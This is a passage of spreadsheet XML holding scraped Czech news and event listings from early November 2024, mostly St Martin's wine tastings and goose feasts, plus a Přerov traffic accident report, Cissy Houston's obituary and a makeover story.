    <t>Mladistvého motorkáře přehlédl PŘEROV - Vjel do křižovatky, kde se střetli. Včera před druhou hodinou odpolední se stala dopravní nehoda v Přerově na křižovatce ulic Klivarova x Dvořákova x Vsadsko . Řidič osobního vozidla značky Ford jel po vedlejší komunikaci Klivarova a hodlal projet křižovatku v přímém směru na ulici Vsadsko . Dle jeho výpovědi se na křižovatce rozhlédl a viděl pouze dodávkové vozidlo, které již bylo za úrovni křižovatky a proto se rozhodl, že bude pokračovat v přímém směru jízdy po jeho projetí. V okamžiku, kdy vjel do křižovatky, spatřil po pravé straně motocykl, který řídil mladistvý motorkář jedoucí ve směru od ulice Dvořákova směrem ke kruhovému objezdu. Na danou situaci již nestihl zareagovat a došlo ke střetu. Řidič fordu uvedl, že měl motocyklistu schovaného za dodávkovým vozidlem a proto jej přehlédl. Po střetu s vozidlem motocyklista přepadl přes řídítka a zůstal ležet na komunikaci. Na místo byla přivolána záchranná služba, která sraženého motorkáře na místě ošetřila a poté převezla na další vyšetření do nemocnice. Řidiči se na místě dopravní nehody podrobili dechové zkoušce na alkohol s negativními výsledky. Hmotná škoda byla předběžně stanovena na 50 000 Kč. por. Mgr. Miluše Zajícová 1. listopadu 2024</t>
  </si>
  <si>
    <t>20241101_510_3303899754_8714754d1dc3436f1070.html</t>
  </si>
  <si>
    <t>8714754d1dc3436f1070</t>
  </si>
  <si>
    <t>Svatomartinský košt</t>
  </si>
  <si>
    <t>Svatomartinský košt Odkaz byl zkopírován Foto: vinazmoravyvinazcech.cz Zažijte nezapomenutelnou atmosféru největší ochutnávky svatomartinských vín. Vinařský fond pořádá již 19. ročník tradičního koštu prvního vína nového ročníku. Přiťukněte si s námi 11. 11. od 11.00 hod. na náměstí Svobody v Brně . Zažijte nezapomenutelnou atmosféru největší ochutnávky svatomartinských vín. Svatomartinský košt nabízí každoročně k ochutnání 100 druhů vín od vinařů z Moravy a z Čech . Centrem města Brna prochází průvod v jehož čele jede sv. Martin na bílém koni, svatý Martin poté slavnostně otevírá lahev na náměstí Svobody v 11.00 hod. Vstupné na akci činí 80 Kč, za které návštěvníci obdrží sklenici, katalog a dobíjecí čip, který si můžou nabít libovolnou částkou, kterou pak hradí vzorky vín. Vzorek vína (0,5 dcl) vyjde na 15 Kč. K poslechu hraje cimbálová muzika. V přilehlých stáncích je možnost zakoupení občerstvení. Svatomartinský košt trvá do podvečerních hodin. Aktuální informace o letošním ročníku najdete na www.vinazmoravyvinazcech.cz Reklama Autor: Pavel Kovář Autor person Pavel Kovář</t>
  </si>
  <si>
    <t>20241101_511_3400814766_d19b55bfaab0a2548116.html</t>
  </si>
  <si>
    <t>d19b55bfaab0a2548116</t>
  </si>
  <si>
    <t>Zámecká slavnost vína</t>
  </si>
  <si>
    <t>Zámecká slavnost vína Odkaz byl zkopírován Foto: vinazmoravyvinazcech.cz Ať již jste dlouholetými milovníky vína , nebo svůj vztah k vínu začínáte teprve rozvíjet, jistě si tuto příležitost k objevům ze světa vína nenecháte ujít. I v rámci 12. ročníku festivalu je hostitelským místem Zámecká jízdárna v Českém Krumlově a její ambiente. Degustaci doprovodí hudební vystoupení českokrumlovské kapely Chlapi v sobě. Akce začíná ve 14.00 hod. a bude pokračovat do nočních hodin. Reklama Autor: Pavel Kovář Autor person Pavel Kovář</t>
  </si>
  <si>
    <t>20241101_512_3295544718_7563a2c5cf56de5b5153.html</t>
  </si>
  <si>
    <t>7563a2c5cf56de5b5153</t>
  </si>
  <si>
    <t>Svatomartinské hody</t>
  </si>
  <si>
    <t>Svatomartinské hody fotografie Program Od 16.00 hod. ubytování Od 18.00 hod. hraje cimbálová muzika a mladé víno teče proudem – bezedná sklenka vína Od 19.00 hod. servírujeme večeři ve snoubení se svatomartinskými víny Až do 22.00 hod. hraje cimbálová muzika a mladé víno teče proudem – bezedná sklenka vína Reklama Pozdrav z kuchyně – čerstvý chléb s husím sádlem – domácí husí/kachní paštika s hroznovou marmeládou a čerstvým velkopavlovickým chlebem – Svatomartinské Svatovavřinecké klaret 2024 – pečené husí stehno, vinařovo bílé a modré zelí, dva druhy knedlíků, Svatomartinské Svatovavřinecké 2024, Svatomartinské Modrý Portugal 2024 – tradiční moravský přesňák plněný povidly, sypaný mákem a maštěný husím sádlem, polosladké mladé víno 2024 Reklama Autor: Pavel Kovář Autor person Pavel Kovář</t>
  </si>
  <si>
    <t>20241101_513_3318380608_55b14b6ba974b45c6d68.html</t>
  </si>
  <si>
    <t>55b14b6ba974b45c6d68</t>
  </si>
  <si>
    <t>Příprava oranžových vín</t>
  </si>
  <si>
    <t>Příprava oranžových vín Přestože je příprava oranžových vín známá především v Gruzii , během posledních let se tato technologie tvorby vína stává světově známou. Cílem přednášky je pomoc účastníkům pochopit a obnovit tuto metodu tvorby vína a ukázat jiné možnosti při zpracování hroznů. Reklama Hlavní témata: – základní principy – oranžová vína z dřevěných sudů – oranžová vína z amfor – eliminace rizik při tvorbě oranžových vín – oranžová vína u nás a ve světě Reklama Autor: Pavel Kovář Autor person Pavel Kovář</t>
  </si>
  <si>
    <t>20241101_514_3360128266_7f12923d7e187ce3c864.html</t>
  </si>
  <si>
    <t>7f12923d7e187ce3c864</t>
  </si>
  <si>
    <t>Husí hody a Svatomartinská vína</t>
  </si>
  <si>
    <t>Husí hody a Svatomartinská vína 0 z 5 Odkaz byl zkopírován Foto: vinazmoravyvinazcech.cz Přijďte i vy na výtečné husí a kachní speciality od našich skvělých kuchařů. Svatomartinská vína v nabídce po celou dobu konání gastroakce. Ochutnat můžete po skleničce, nebo pro vás otevřeme celou láhev. Reklama V sobotu od 19.00 hod. vám večer zpříjemní harmonikář, vstupné je zdarma. Reklama Autor: Pavel Kovář Autor person Pavel Kovář</t>
  </si>
  <si>
    <t>20241101_515_3400814748_d174c6738932e7cdc77e.html</t>
  </si>
  <si>
    <t>d174c6738932e7cdc77e</t>
  </si>
  <si>
    <t>Dálková degustace moravských červených</t>
  </si>
  <si>
    <t>Dálková degustace moravských červených fotografie Vybraná vína seřadíme do skupin po deseti podle odrůd či regionů původu a rozlijeme do půldecových lahviček. Degustační sady deseti různých vzorků pak za 250 Kč (+ poštovné a záloha na lahvičky) rozešleme zájemcům o víno , jejichž příjemným úkolem je vzorky kdykoliv v následujících čtrnácti dnech samostatně porovnat a pokusit se je seřadit podle svých preferencí. Tyto a tak i jednotlivá pořadí se často liší, ale po jejich statistickém vyhodnocení a vyhlášení celkových výsledků máme všichni zajímavou zpětnou vazbu, který typ vín zaujal nejvíce lidí. Reklama O rezervaci degustačních balíčků, případně o bližší informace a aktuální program degustací, které pořádáme každých čtrnáct dnů, si můžete psát na adresu degustace@email.cz Reklama Autor: Pavel Kovář Autor person Pavel Kovář</t>
  </si>
  <si>
    <t>20241101_516_3351533322_f1eccd4fdef9f66adec8.html</t>
  </si>
  <si>
    <t>f1eccd4fdef9f66adec8</t>
  </si>
  <si>
    <t>Svatomartinský košt v Plzni</t>
  </si>
  <si>
    <t>Svatomartinský košt v Plzni fotografie Na tradičním místě v Křižíkových sadech na vás bude čekat 14 tuzemských vinařství, u jejichž stánků budete moci ochutnat první vína ročníku 2024. Kromě vína se můžete těšit na tématické občerstvení v podobě husího a kachního menu. Festivalem budou provázet moderátor Luděk Holý a sommelier Zdeněk Kintr. Reklama Vstupné na akci je zdarma. Víno se bude nalévat výhradně do festivalových sklenic, které budou k zakoupení přímo na místě za 70 Kč. Reklama Autor: Pavel Kovář Autor person Pavel Kovář</t>
  </si>
  <si>
    <t>20241101_517_3287055172_c411b8b71ab1884c5222.html</t>
  </si>
  <si>
    <t>c411b8b71ab1884c5222</t>
  </si>
  <si>
    <t>Svatomartinské trhy Poděbrady</t>
  </si>
  <si>
    <t>Svatomartinské trhy Poděbrady fotografie Tradiční událost spojená s ochutnávkami prvních vín aktuálního ročníku se uskuteční v sobotu 9. listopadu na 1. nádvoří zámku a na Jiřího náměstí v Poděbradech . Mladá a svatomartinská vína vám zde představí celkem 10 moravských vinařství. Kromě vína se můžete těšit také na staročeský jarmark, příjezd Martina na bílém koni či cimbálovou muziku. Reklama Vstup na akci je zdarma. Víno se bude nalévat výhradně do speciálních svatomartinských sklenic, které budou k zakoupení přímo na místě za 70 Kč. Reklama Autor: Pavel Kovář Autor person Pavel Kovář</t>
  </si>
  <si>
    <t>20241101_518_3242304184_32bd72dc5c3882b181c3.html</t>
  </si>
  <si>
    <t>32bd72dc5c3882b181c3</t>
  </si>
  <si>
    <t>Všemi zbožňovaná zpěvačka odešla do nebe. Její dcera, která tragicky zemřela, tam na ni čeká už 12 let</t>
  </si>
  <si>
    <t>Všemi zbožňovaná zpěvačka odešla do nebe. Její dcera, která tragicky zemřela, tam na ni čeká už 12 let Fenomenální umělkyně, která navždy opustila tento svět, vystupovala s nejzářivějšími hudebními legendami, jako byla Aretha Franklin , Jimi Hendrix nebo Elvis Presley . Hudební svět se zahalil do smutku. Ve věku 91 let zemřela americká zpěvačka Cissy Houstonová, která byla matkou zesnulé popové hvězdy Whitney Houstonové . Legendární soulová a gospelová umělkyně je držitelkou dvou cen Grammy. Jako doprovodná zpěvačka vystupovala s hudebními ikonami, jako byla Aretha Franklin , Jimi Hendrix, Paul Simon nebo Elvis Presley . O jejím úmrtí informovala rodina. Zemřela na komplikace spojené s nemocí V prohlášení rodiny, které cituje server Deadline , je uvedené, že zemřela na komplikace spojené s Alzheimerovou chorobou ve svém domě v Newarku v americkém státě New Jersey . Houstonová vystupovala už od útlého věku v kostele a byla součástí rodinného gospelového souboru. V 60. letech prorazila v populární hudbě jako členka doprovodné skupiny The Sweet Inspirations s Doris Troyovou a svou neteří Dee Dee Warwickovou. Cissy Houston , renowned soul and gospel singer and mother to Whitney Houston , died at the age of 91. Houston , a… Zveřejnil(a) Variety dne Pondělí 7. října 2024 „Naše srdce jsou plná bolesti a smutku. Ztratili jsme matku své rodiny. Byla silnou a vyčnívající postavou v našich životech. Byla to žena hluboké víry a přesvědčení. Velmi jí záleželo na rodině, službě a komunitě ,“ cituje agentura AP snachu zesnulé umělkyně Pat Houstonovou s tím, že rodina bude vzpomínat na její více než sedm dekád trvající hudební kariéru. Hudební svět přišel o další legendu. Zemřela zpěvačka, jejíž taneční píseň bořila diskotéky Slavnější dcera navždy odešla před 12 lety Z Houstonové se stala velmi žádaná doprovodná zpěvačka a během své kariéry nazpívala na 600 písní různých žánrů. Obě své ceny Grammy získala za gospelová alba Face to Face a He Leadeth Me. Její vokály znějí v písních celé řady populárních umělců , jako je Donna Hathaway, Beyoncé nebo její dcera Whitney , která zemřela před 12 lety. Také ona zpívala už od dětství v kostelním sboru. Díky obrovskému talentu v popularitě svou matku nakonec předčila. Zveřejnil(a) Cissy Houston dne Středa 5. září 2018 Letos by oslavila 85. narozeniny: Do věčných lovišť odešla další oblíbená česká zpěvačka Společně často zpívaly na koncertech a objevily se ve filmu Kazatelova žena i ve videoklipu k hitu Greatest Love of All. Jenže kariéru šestinásobné držitelky Grammy těžce poznamenal krach manželství s Bobbym Brownem , alkohol a drogy . Zemřela v únoru 2012 ve věku 48 let. Utonula ve vaně hotelového apartmá v Beverly Hills . Podle webu LATimes si její matka kladla za vinu, že si dlouho nechtěla připustit, že dcera je závislá na kokainu. Autor: Martina Ševčíková Autor person Martina Ševčíková</t>
  </si>
  <si>
    <t>27210</t>
  </si>
  <si>
    <t>32080</t>
  </si>
  <si>
    <t>20241101_519_3241153914_86dd02bd1093aa486f36.html</t>
  </si>
  <si>
    <t>86dd02bd1093aa486f36</t>
  </si>
  <si>
    <t>Svatomartinská husa na Budějovicku</t>
  </si>
  <si>
    <t>Svatomartinská husa na Budějovicku ceskeobzory.cz – redakce 1 listopadu, 2024 Pečená husa, červené nebo bílé zelí, knedlíky a někdy také lokše či polévka z drobů zvaná kaldoun. Nejen tyto pochoutky najdete na tradičním svatomartinské menu, na kterém si s oblibou pochutnávají hosté restaurací v období listopadu. Na Budějovicku je husta často podávána s pivem , ale nechybí ani víno . Svatý Martin láká do jižních Čech také turisty. Ti si už nyní rezervují místa u stolu a lůžka v hotelích. Zájem je každoročně veliký. Období od 6. do 17. listopadu nebude pro husy úplně veselé, avšak rozveselí všechny milovníky dobrého jídla. Řada restaurací v Turistické oblasti Budějovicko v jižních Čechách totiž naplánovala tradiční Svatomartinské husí menu, o které je každoročně velký zájem a už nyní se plní rezervace. Volné kapacity jsou často během týdne, ale také v neděli. “V tuto chvíli máme na seznamu téměř čtyřicet restaurací z Budějovicka , které nám potvrdily Svatomartinskou nabídku. To je téměř dvojnásobek oproti loňskému roku. Místo u stolu na husí hostinu určitě doporučujeme rezervovat předem,” uvádí ředitel Turistické oblasti Budějovicko Tomáš Polanský. Seznam těchto restaurací najdete na webu https://bit.ly/husa_na_budejovicku Stále častěji využívají budějovické restaurace drůbež z lokálních chovů a malých farem. Jednou z nich například známá budějovická restaurace Klika Kitchen, která odebírá husy z volného chovu a v kuchyni používá i další lokální suroviny. “Husy máme jako obvykle z farmy od manželů Tůmových z Chelčic . Kromě pečené husí čtvrtky s červeným zelím s povidly a houskovým knedlíkem s kaštany bude v nabídce celá řada dalších pochoutek z husího masa. Například marinovaná smažená husí játra, paštika s rakytníkem a nakládanou zeleninou nebo plněné knedlíky s husím masem. Tím však svatomartinská hostina v naší restauraci nekončí,” popisuje nabídku majitel restaurace Petr Klika. Husí speciality a suroviny z místních zdrojů najdete také v Pivnici Zvon na Náměstí Přemysla Otakara II. v centru Českých Budějovic . Generální manažer Grandhotelu Zvon Zdeněk Novotný k tomu dodává: “Husu pomalu konfitujeme v sádle přes noc až 14 hodin. Nechybí domácí žemlový knedlík, bramborové drbáky, švestkové červené zelí a husí jus. Jsou to recepty vycházející z tradice česko-vídeňské kuchyně.” V Budějcích se k huse pije pivo ! Tradičně se sice ke svatomartinskému menu podává mladé víno aktuálního ročníku, ale na Budějovicku musíte přihlédnou k místní pivovarské tradici. Nemělo by vás tedy překvapit, pokud k huse dostanete půlitr dobře načepovaného ležáku. Potvrzuje to také vyhlášená pivnice Masné krámy. “Mladé víno v nabídce naší restaurace také najdete, my však preferujeme Budvarský ležák, který se k huse skvěle hodí a sváteční tabuli perfektně chuťově doplní,” říká Tomáš Olejník, vedoucí gastro oddělení Budějovického Budvaru , n.p., který pivnici provozuje. Ležák nebo pivní speciály si pak k jídlu můžete dát také v podnicích, které vaří vlastní pivo . Například Minipivovar Kněžínek, Solnice či Krajinská 27, ale také ve známých budějovických pivnicích, kde se svatomartinské menu také chystá. Svatomartinský týden láká tradičně také turisty. Ti si již nyní rezervují pobyty a chystají se na pohodovou atmosféru, která v mimosezoně v jižních Čechách panuje. Lákají je nejen České Budějovice , ale také třeba Safari Resort v Hluboké u Borovan s vlastní restaurací nebo Hluboká nad Vltavou . Vytrávit tučnou hostinu zde mohou v Zoo Hluboká nebo cestou na Zámek Hluboká , jejichž provozy fungují celoročně. “Svatomartinský týden je skvělou příležitostí, jak spojit dobré jídlo s návštěvou oblíbených turistických míst. Mimosezónu na Budějovicku si oblíbili především požitkáři, kteří nikam nespěchají a chtějí si vychutnat odpočinkovou atmosféru podzimu. Letošní zvýšený zájem o husí speciality to jen potvrzuje.” říká Tomáš Polanský. foto: Zuzana Reifová Podobné příspěvky 18 března, 2024 17 března, 2024 V sobotu 23. března 2024 čeká na návštěvníky poličského muzea bohatý dopolední i odpolední program a výstavy Vzhůru do středověku! a Dejte vejce malovaný… oživené starými řemesly a tradicemi. O první jarní sobotě zavládne v muzeu atmosféra středověku, ale i starých řemesel, tradic a hlavně zábavy. Celé dopoledne budou návštěvníci přímo ve výstavě Vzhůru do středověku! obdivovat… 28 května, 2024 7 září, 2024 Nádraží a depo Českých drah v pražských Vršovicích se v sobotu 1. června stane dějištěm Regionálního dne železnice. Návštěvníci se během této velkolepé akce mohou těšit na ukázky nejnovějších vozidel, které České dráhy v následujících měsících nasadí na vybrané tratě v Praze a Středočeském kraji , včetně nejnovější soupravy ComfortJet, ale i na nostalgické jízdy historických vlaků. Připravené budou také prohlídky depa… 18 května, 2024 7 září, 2024 Objevovat strašidla v zámeckém parku za svitu měsíce, užít si divadelní představení, prohlídnout interiéry zámku s místním duchem nebo se zaposlouchat do večerních koncertů. To všechno mohou zažít návštěvníci Noční Kačiny v pátek 31. května. Národní zemědělské muzeum Kačina připravilo bohatý večerní program od 18 do 23 hodin. Podvečer se ponese v divadelním duchu. V 18 hodin zahájí program… ceskeobzory.cz – redakce 3 září, 2024 Pivo k jižním Čechám zkrátka patří. Díky velkému množství pivovarů a minipivovarů v regionu z nich lze snadno sestavit i jednotlivé stezky. Návštěvníci jich v kraji mohou projít nebo projet hned sedm. Takové putování za chutí zlatavého moku může být ideálním tipem na podzimní výlet, a to i třeba pro teambuildingovou akci. Pivní kultura je… ceskeobzory.cz – redakce 11 května, 2024 Jarní sezóna čerstvosti a bylinek startuje, přijďte si pro to nejlepší, co farmáři nabízejí. Už jste si někdy povzdechli nad tím, proč nemáme v České republice trhy, jaké znáte ze zahraničí? Takové ty poctivé celoroční trhy v halách, kde kupujete kvalitní maso a výrobky přímo od farmářů, koše a bedýnky přetékají čerstvým ovoce a zeleninou a vy… 21 března, 2024 20 března, 2024 Venkovní expozice zahrady jsou plné jarních květin, skleník Fata Morgana zaplní Tropické květy a rozkvetlá je i nová publikace V Botanické zahradě hl. m. Prahy je jaro v plném proudu. V expozicích jsou vidět jarní květy ladoněk, narcisů, tulipánů a hyacintů. Kvetou zlatice, japonské meruňky, lískovníčky i magnolie. V expozici prezentující ohrožené druhy ČR rozkvétá kriticky ohrožený koniklec… Autor: ceskeobzory.cz – redakce Rubrika transition_slide Gastronomie</t>
  </si>
  <si>
    <t>20241101_52_3264625216_29173e633b504af14bb1.html</t>
  </si>
  <si>
    <t>29173e633b504af14bb1</t>
  </si>
  <si>
    <t>Medový den aneb bez medu neodejdu, pozvánka na akci v Turnově</t>
  </si>
  <si>
    <t>Medový den aneb bez medu neodejdu, pozvánka na akci v Turnově Těšit se můžete na různé druhy medu a medovin, medové menu a zákusky, medové pivo , svíčky a medovou kosmetiku. Po celou dobu Vám budou k dispozici včelaři, kteří Vám rádi zodpoví Vaše otázky. Pro děti je připravena medová stezka, živý úl, ukázky pomůcek, různé úkoly a dílničky. Pódium pak bude patřit loutkovému divadlu pro děti, hudebnímu workshopu a vystoupení irských tanců. Na akci nebudou chybět ani další regionální prodejci se svými ručními výrobky (keramika, dekorace, přírodní věnce, bylinné čaje, sirupy, atd.) Součástí akce bude i soutěž O nejkrásnější nazdobený perníček. Dejte svůj hlas perníčku, který je podle Vás nejkrásnější. Veškerý výtěžek z dražby a prodeje těchto soutěžních perníčků půjde na aktivitu "Dopoledne s terapeutickým koníkem" pro děti ze speciální ZŠ Sluníčko. Těšíme se na Vás. close info Zdroj: Medový den zoom_in Autor: Čtenář reportér Rubrika transition_slide Zprávy</t>
  </si>
  <si>
    <t>19770</t>
  </si>
  <si>
    <t>9740</t>
  </si>
  <si>
    <t>20241101_520_3351533315_633fb3bd5a9378d8c3b3.html</t>
  </si>
  <si>
    <t>633fb3bd5a9378d8c3b3</t>
  </si>
  <si>
    <t>Svatomartinské husy s ochutnávkou vín</t>
  </si>
  <si>
    <t>Svatomartinské husy s ochutnávkou vín 0 z 5 Chybět samozřejmě nebudou ani mladá Svatomartinská vína z naší vlastní produkce, která dokonale doplní lahodné menu. Reklama Vstup je zdarma. Těšít se můžete na: – tradiční pečenou husu se dvěma druhy zelí, knedlík – husí játra na cibulce s pečivem – Svatomartinská vína a vína z naší stálé nabídky – hudební doprovod v podobě cimbálové muziky a příjemnou atmosféru Rezervace míst není nutná, rezervace porcí hus však ano. Počty porcí hlaste na telefonním čísle 739 019 120 nebo emailem na marketing@vinarstviknezihora.cz. Platba bude možná pouze v hotovosti. Těšíme se na společně strávený večer plný dobrého jídla, vína a přátelského setkání! Tým vinařství Kněží hora Reklama Autor: Pavel Kovář Autor person Pavel Kovář</t>
  </si>
  <si>
    <t>20241101_521_3371717558_29c30270084282b73bd1.html</t>
  </si>
  <si>
    <t>29c30270084282b73bd1</t>
  </si>
  <si>
    <t>SLZA akusticky ve vinařství SPIELBERG</t>
  </si>
  <si>
    <t>SLZA akusticky ve vinařství SPIELBERG 0 z 5 fotografie Populární mnohonásobně oceněná česká popová formace zásobuje domácí scénu hity již od roku 2014. Za 10 letou existenci složila kapela SLZA řadu hitů a ty Vám právě akusticky zahrají v sobotu 23. listopadu 2024 od 19.00 hod. ve vinařství SPIELBERG v Křišťálovém sále. Těšit se můžete rozhodně na Lhůtu záruční či Celibát, zkrátka bude to pořádná dávka krásné muziky a rozhodně tak z blízka, jak se vám naskytne jen na SPIELBERGu. Přijďte si před koncertem užít sklenku vína , otevíráme už 17.00 hod. Reklama Autor: Pavel Kovář Autor person Pavel Kovář</t>
  </si>
  <si>
    <t>20241101_522_3264642499_c1b3000823aaca10c007.html</t>
  </si>
  <si>
    <t>c1b3000823aaca10c007</t>
  </si>
  <si>
    <t>Workshop s národní sommelierkou – Velkopavlovicko &amp;amp; šumivá a perlivá vína</t>
  </si>
  <si>
    <t>Workshop s národní sommelierkou – Velkopavlovicko &amp;amp; šumivá a perlivá vína 0 z 5 fotografie Ve třech degustačních setech společně ochutnáme devět vín z mezinárodní scény různých stylů a poté se budeme věnovat vínům, která s sebou donesou účastníci. Vína by měla být ideálně vlastní produkce, pokud ale v nabídce takové víno nemáte, přineste jiné v tomto stylu, které vás zaujalo či na které chcete znát cizí názor. Dodání vzorku vína je dobrovolné, doporučená maloobchodní cena vína je do 350 Kč s DPH. Vína budeme hodnotit nejen z pohledu kvality a použité výrobní technologie, ale také s ohledem na jejich cenové zařazení na trhu. Komplexní a řádné zhodnocení vín zajistí a garantuje národní sommelierka, kterou doplní svými názory i doc. Miloš Michlovský. Reklama Autor: Pavel Kovář Autor person Pavel Kovář</t>
  </si>
  <si>
    <t>20241101_523_3241254038_12849e04871441edda55.html</t>
  </si>
  <si>
    <t>12849e04871441edda55</t>
  </si>
  <si>
    <t>Matku, která o sebe roky nepečovala, zavedly dcery za stylistou. Ten jí během chvíle změnil život</t>
  </si>
  <si>
    <t>Matku, která o sebe roky nepečovala, zavedly dcery za stylistou. Ten jí během chvíle změnil život Fotografie: Depositphotos Když se dcery rozhodly mamince darovat návštěvu u stylisty, otevřely jí dveře k nečekanému oživení. Proměna jí dodala nový vzhled, ale i sílu a radost. Přeměna vzhledu dokáže posunout i náš pohled na svět a na sebe samotné, uvádí web Webniusy. Maminka jménem Rita, které dcery darovaly setkání se stylistou, prošla neuvěřitelnou proměnou. Výsledkem nebyl jen nový účes nebo styl, ale i nově nalezené sebevědomí, díky němuž se Rita znovu zamilovala do svého vzhledu. Nový styl od odborníka Setkání s uznávaným stylistou, zaměřeným na proměny běžných lidí, bylo pro Ritu zcela nové. S pomocí pečlivého výběru barev a střihů se její vzhled změnil tak, že zdůraznil její přirozenou krásu. „Vypadáš jako nová žena,“ chválily ji dcery během celého procesu. Rita měla zpočátku obavy z radikální změny, ale nakonec se s důvěrou svěřila do rukou zkušeného odborníka. Stylista začal jemným líčením, které zvýraznilo její oči a dodalo jí mladistvý vzhled. Namísto výrazných změn se rozhodl pro decentní barvy, díky nimž Rita rozkvetla. Podobné proměny mohou pro starší ženy znamenat příležitost objevit novou vášeň pro vlastní vzhled. Kadeřník nabízí své služby zdarma pro lidi, kteří to potřebují nejvíce. Tito bezdomovci jsou k nepoznání Změna přinášející sebevědomí Rita nikdy dříve nezvažovala radikální změny barvy či délky vlasů, ale tentokrát se rozhodla riskovat. Nový kratší účes a světlejší tón vlasů jí dodaly živost, a když se podívala do zrcadla, zářila štěstím. Její dcery byly nadšené, když uviděly proměnu, Rita teď nejen vypadala mladší, ale i spokojenější. Jak uvádí web Fabulous After 40, proměny od stylisty s přezdívkou The Makeover Guy dokážou nejen změnit vzhled, ale i celkové vyzařování a sebedůvěru. S novým vzhledem začala Rita vnímat sama sebe v lepším světle. Proměna jí dodala odvahu k dalším krokům a inspirovala ji k přijetí dalších výzev v životě. Na SvětěKreativity jsme také psali o ženě, která zakoupila za 50 korun v second handu náušnice vysoké hodnoty, o čemž však zpočátku neměla ani tušení. Léčivá maska z piva zabrání vypadávání vlasů a podpoří jejich růst 5. 2. 2020 Vypadávání vlasů může způsobovat mnoho faktorů. Od nevhodné kosmetiky, přes špatnou stravu, stres, zdravotního problému. Časté barvení, umývání, vysoušení horkým vzduchem, používání žehličky na vlasy – to vše může nejen způsobovat, ale i zhoršovat vypadávání vlasů. […] Plešatící muž přišel za kadeřníkem s kuriózní prosbou. Profesionál tuto proměnu označil za svůj životní výkon 19. 7. 2024 Jeho sebevědomí bylo na bodu mrazu a kvůli své plešatosti dokonce přicházel i o pracovní příležitosti. Pak si ho vzal do parády kadeřník a změnil ho k nepoznání. Vlasy jsou korunou ženské krásy, říká se. […] Starší žena chtěla po rozvodu totálně změnit svůj vzhled. Když odešla od kadeřníka, vypadala jako úplně jiný člověk 21. 2. 2022 Christopher Hopkins je uznávaný kadeřník v USA . Své klienty mění k nepoznání a jeho práce je opravdu velmi strhující. […] Za málo peněz, hodně muziky aneb snadná proměna vašeho domova v příjemné místo k životu 16. 5. 2019 Rádi byste změnili vzhled i atmosféru svého domova, ale nevíte, jak toho docílit? Pak jste tady správně. Mnohdy není zapotřebí velkých investic. Za málo peněz, hodně muziky. Pokud hodně dlouhou dobu žijete ve stejném bytě, […] Kadeřník tvrdil přesvědčené ženě, že její přání je téměř nereálné. Svůj výkon označil za životní dílo 16. 2. 2024 Snem mnoha žen je vypadat mladší, než ve skutečnosti jsou. K těmto dámám patří i Ellen, ta se ale rozhodla, že se s tímto snem nehodlá rozloučit, a svěřila se do rukou odborníkovi. Christopher Hopkins […] 69letá žena po rozvodu toužila po radikální změně. Její přání stylistovi ihned vyrazilo dech 29. 4. 2024 Susan se po rozvodu rozhodla pro změnu vzhledu. Věděla, že pomoct jí může jen jeden muž, Christopher Hopkins, známý jako Makeover Guy. Proměna je ohromující. Která žena by se nechtěla cítit krásná, atraktivní a plná […] Buďte první kdo přidá komentář Napište komentář Vaše e-mailová adresa nebude zveřejněna. Komentář Autor: František Zahradníček Autor person František Zahradníček Rubrika transition_slide Příběhy</t>
  </si>
  <si>
    <t>25440</t>
  </si>
  <si>
    <t>4600</t>
  </si>
  <si>
    <t>20241101_524_3367251914_618b318aad903458c7fe.html</t>
  </si>
  <si>
    <t>618b318aad903458c7fe</t>
  </si>
  <si>
    <t>Zámecký Svatomartinský košt</t>
  </si>
  <si>
    <t>Zámecký Svatomartinský košt fotografie Po celou dobu akce bude nabízeno bohaté občerstvení. Připravili jsme pro vás tombolu o velmi hodnotné ceny. 1. cena – 24 láhví vína . Všechny vzorky a produkty budou za VINODUKÁTY. Můžete si je zakoupit na označeném místě. Předvedení sabrage a kompletní hudební program akce se bude odehrávat přímo na stage ve stanu. Předpokládané ukončení akce je v 20.00 hod. Na akci se můžete přihlásit pomocí webového formuláře, nebo přímo na místě. Reklama Autor: Pavel Kovář Autor person Pavel Kovář</t>
  </si>
  <si>
    <t>20241101_525_3351530846_bd62f88fb2bcb03d0aa9.html</t>
  </si>
  <si>
    <t>bd62f88fb2bcb03d0aa9</t>
  </si>
  <si>
    <t>Svatomartinské otevřené sklepy</t>
  </si>
  <si>
    <t>Svatomartinské otevřené sklepy Odkaz byl zkopírován Foto: vinazmoravyvinazcech.cz A co vás čeká již od 9.30 hod. před Městským úřadem? – zahraje cimbálová muzika – mladí verbíři – příjezd Bohů a svatého Martina – průvod a výstava traktorů a vinařské techniky Reklama Kdy budou otevřené sklepy a co vás v nich čeká? – celkem 22 sklepů bude otevřeno od 11.00 do 18.00 hod. – doprovodný kulturní i folklorní program po sklepech – občerstvení ve vybraných vinařství VSTUPNÉ 1 390 Kč Vstupenka zahrnuje: – neomezenou degustaci ve všech otevřených sklepech – kupony na nákup vína v celkové hodnotě 700 Kč (v předprodeji 800 Kč) – mapu města se zaznačenými otevřenými sklepy – brožuru s kompletní nabídkou a průvodcem – taštičku se skleničkou na víno – stylovou propisku Prodej a výdej vstupenek z předprodeje bude na MěÚ ve Velkých Pavlovicích v pátek 15. 11. a v sobotu 16. 11. Na místě bude dostatek vstupenek k zakoupení pro všechny zájemce. Reklama Bližší informace o programu a předprodej. Těšíme se na vás. Reklama Autor: Pavel Kovář Autor person Pavel Kovář</t>
  </si>
  <si>
    <t>20241101_526_3360127855_d4607a7dce9b0572b4fe.html</t>
  </si>
  <si>
    <t>d4607a7dce9b0572b4fe</t>
  </si>
  <si>
    <t>Po stopách opičky Emilky za mladým vrbeckým vínem</t>
  </si>
  <si>
    <t>Po stopách opičky Emilky za mladým vrbeckým vínem 0 z 5 Odkaz byl zkopírován Foto: vinazmoravyvinazcech.cz Vinařské obci Vrbice se v okolí přezdívá “opičí hory” – prý se u nás hodně pije. Vinaři Vrbice se rozhodli udělat si legraci sami ze sebe, a proto si opičku Emilku zvolili za svého maskota. Při příležitosti svátku opičky Emilky pořádáme podzimní putování po vinných sklepech spojené s ochutnávkou mladých vín. Mladých, ne Svatomartinských. Záleží totiž pouze na filosofii toho kterého vinaře, zda vám dá ochutnat vína čirá, jiskrná a stabilizovaná do láhve, anebo vás přizve k vinařskému dobrodružství v podobě ochutnávky mladých vín právě takových, jaká jsou teď. Reklama Nákup vstupenky online ZDE. Program akce Sobota 16. 11. 10.30 Zahájení prodeje vstupenek a výdej vstupenek za vouchery z předprodeje 11.00 Otevření vinných sklepů pro volné ochutnávky vín 18.00 Uzavření vinných sklepů 18.30 Slosování o ceny a ohňová show na Stráži Neděle 17. 11. 10.00–12.00 Otevřené sklepy pro odběr vín Podrobnější informace naleznete na stránkách www.vinarivrbice.cz Reklama Těší se na vás Vinaři Vrbice. 